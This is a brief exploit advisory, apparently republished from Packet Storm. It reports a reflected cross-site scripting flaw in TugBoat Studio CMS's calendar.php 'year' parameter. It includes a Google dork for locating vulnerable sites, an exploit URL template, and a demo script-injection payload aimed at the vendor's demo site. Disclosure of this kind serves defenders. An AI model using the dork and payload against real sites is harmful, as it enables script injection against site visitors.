TugBoat Studio CMS suffers from a cross site scripting vulnerability.
472d58a7f3e1d71ef4a62d68424a5cf4dfad1b94e1add01708a812cf5cb52709 ===========================================================================================
Title : Cross-site Scripting (XSS) Vulnerability
Software : TugBoat Studio CMS
Vendor : http://tugboatcms.com/
Date : 26 April 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
===========================================================================================
[-] Google Dork
"Powered by TugBoat Studio"
[-] Vulnerable
calendar.php
[-] Exploit
http://[site]/[path]/calendar.php?year=[XSS]
[-] Demo
http://demo.tugboatcms.com/pages/calendar.php?year=<script>alert(123)</script>
===========================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed